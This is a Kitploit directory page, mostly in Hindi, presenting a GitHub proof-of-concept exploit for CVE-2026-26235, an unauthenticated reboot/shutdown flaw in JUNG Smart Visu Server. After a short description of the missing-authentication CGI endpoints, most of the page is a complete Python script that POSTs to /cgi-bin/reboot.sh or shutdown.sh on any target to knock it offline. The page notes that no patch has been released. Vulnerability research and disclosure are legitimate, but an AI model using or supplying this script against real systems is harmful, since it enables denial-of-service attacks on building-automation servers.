Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown — # CVE-2026-26235 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट JUNG Smart Visu Server <=1.1.1050 में एक अनप्रमाणित डिनायल-ऑफ-सर्विस भेद्यता, जो उजागर CGI एंडपॉइंट्स के माध्यम से रिमोट रीबूट या शटडाउन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown

CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown

# CVE-2026-26235 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट JUNG Smart Visu Server <=1.1.1050 में एक अनप्रमाणित डिनायल-ऑफ-सर्विस भेद्यता, जो उजागर CGI एंडपॉइंट्स के माध्यम से रिमोट रीबूट या शटडाउन की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
227 महीने पहलेअभी तक समीक्षित नहीं

👤 लेखक

मोहम्मद इदरीस बन्यामेर

  • 📍 देश: जॉर्डन
  • 📸 इंस्टाग्राम: @banyamer_security

Python Version CVE CVSS CWE Author

CVE-2026-26235 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट - JUNG Smart Visu Server ≤ 1.1.1050 में लापता प्रमाणीकरण के माध्यम से बिना प्रमाणीकरण के सेवा से इनकार (Denial of Service)।


🚨 भेद्यता विवरण

CVE-2026-26235 JUNG Smart Visu Server संस्करण ≤ 1.1.1050 में एक बिना प्रमाणीकरण के सेवा से इनकार (denial of service) भेद्यता है। यह उत्पाद महत्वपूर्ण सिस्टम प्रबंधन कार्यों के लिए प्रमाणीकरण लागू करने में विफल रहता है, जिससे दूरस्थ हमलावर एक ही POST अनुरोध के साथ सर्वर को रीबूट या बंद कर सकते हैं।

एंडपॉइंट /cgi-bin/reboot.sh और /cgi-bin/shutdown.sh बिना किसी प्रमाणीकरण जांच के उजागर होते हैं। इन सिस्टम-स्तरीय कमांड को ट्रिगर करने के लिए कोई सत्र टोकन, API कुंजी या क्रेडेंशियल की आवश्यकता नहीं है।

यह अनुमति देता है:

  • बिना प्रमाणीकरण के सिस्टम रीबूट/शटडाउन
  • कोई उपयोगकर्ता इंटरैक्शन आवश्यक नहीं
  • पूर्ण सेवा व्यवधान
  • लगातार सेवा से इनकार

🎯 प्रभावित संस्करण

स्थितिसंस्करण
❌ कमजोरJUNG Smart Visu Server ≤ 1.1.1050
✅ पैच किया गयाअभी तक जारी नहीं किया गया

परीक्षण किया गया: JUNG Smart Visu Server 1.1.1050, एम्बेडेड लिनक्स


💥 प्रभाव

वेक्टरविवरण
CVSS v48.7 (उच्च) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
प्रमाणीकरणकोई नहीं - पूरी तरह से बिना प्रमाणीकरण
हमला वेक्टरनेटवर्क
जटिलताकम
प्रभावउच्च उपलब्धता प्रभाव

🔬 तकनीकी विवरण

मूल कारण

  1. लापता प्रमाणीकरण - CWE-306: उत्पाद महत्वपूर्ण सिस्टम कार्यों के लिए कोई प्रमाणीकरण नहीं करता है
  2. उजागर CGI एंडपॉइंट - /cgi-bin/reboot.sh और /cgi-bin/shutdown.sh सार्वजनिक रूप से सुलभ हैं
  3. कोई सत्र सत्यापन नहीं - कोई कुकी, टोकन या क्रेडेंशियल सत्यापन नहीं होता है
  4. प्रत्यक्ष सिस्टम कमांड निष्पादन - CGI स्क्रिप्ट विशेषाधिकार जांच के बिना सिस्टम रीबूट/शटडाउन कमांड निष्पादित करती हैं

भेद्यता प्रवाह

हमलावर → POST /cgi-bin/reboot.sh → कोई प्रमाणीकरण जांच नहीं → सिस्टम रीबूट → DoS
हमलावर → POST /cgi-bin/shutdown.sh → कोई प्रमाणीकरण जांच नहीं → सिस्टम शटडाउन → DoS

🛠️ प्रूफ ऑफ कॉन्सेप्ट

पायथन एक्सप्लॉइट स्क्रिप्ट

#!/usr/bin/env python3
# Exploit Title: JUNG Smart Visu Server - Unauthenticated Remote Reboot/Shutdown
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)

import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_banner():
    print("\n" + "="*60)
    print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
    print(" CVE-2026-26235 | CWE-306")
    print("="*60 + "\n")

def exploit(target, action="reboot", verify_ssl=False, timeout=10):
    endpoints = {
        "reboot": "/cgi-bin/reboot.sh",
        "shutdown": "/cgi-bin/shutdown.sh"
    }
    
    if action not in endpoints:
        print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
        return False
    
    url = f"{target.rstrip('/')}{endpoints[action]}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
        "Origin": target.rstrip('/'),
        "Referer": f"{target.rstrip('/')}/",
        "DNT": "1",
        "Sec-GPC": "1"
    }
    
    print(f"[*] Target      : {url}")
    print(f"[*] Action      : {action.upper()}")
    print(f"[*] SSL Verify  : {verify_ssl}")
    print("[*] Sending unauthenticated POST request...\n")
    
    try:
        response = requests.post(
            url, 
            headers=headers,
            data="",  
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False
        )
        
        print(f"[+] Request sent successfully!")
        print(f"[+] HTTP Status : {response.status_code}")
        
        if response.status_code == 200:
            print("[!] Server responded with 200 OK - action likely executed")
        elif response.status_code == 302 or response.status_code == 301:
            print("[!] Server responded with redirect - action may have been triggered")
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
        
        if response.text:
            print(f"[*] Response preview: {response.text[:200].strip()}")
        
        print("\n[!] If successful, the target server should now be restarting or shutting down.")
        return True
        
    except requests.exceptions.Timeout:
        print("[-] Connection timeout. The server may be down or unreachable.")
        print("[*] This could indicate successful DoS if the server was previously reachable.")
        return True
    except requests.exceptions.ConnectionError as e:
        print(f"[-] Connection error: {e}")
        print("[*] The server may have gone down - possibly successful exploitation.")
        return True
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
    )
    parser.add_argument(
        "target",
        help="Target server URL (e.g., https://192.168.1.100:8080)"
    )
    parser.add_argument(
        "-a", "--action",
        choices=["reboot", "shutdown"],
        default="reboot",
        help="Action to perform: reboot or shutdown (default: reboot)"
    )
    parser.add_argument(
        "-k", "--insecure",
        action="store_false",
        dest="verify_ssl",
        default=False,
        help="Disable SSL certificate verification (default: disabled)"
    )
    parser.add_argument(
        "-t", "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    
    args = parser.parse_args()
    
    print(f"[*] Starting exploit against: {args.target}\n")
    
    success = exploit(
        target=args.target,
        action=args.action,
        verify_ssl=args.verify_ssl,
        timeout=args.timeout
    )
    
    if success:
        print("\n[+] Exploit completed successfully.")
    else:
        print("\n[-] Exploit failed.")
        sys.exit(1)

if __name__ == "__main__":
    main()
टूल डाउनलोड करें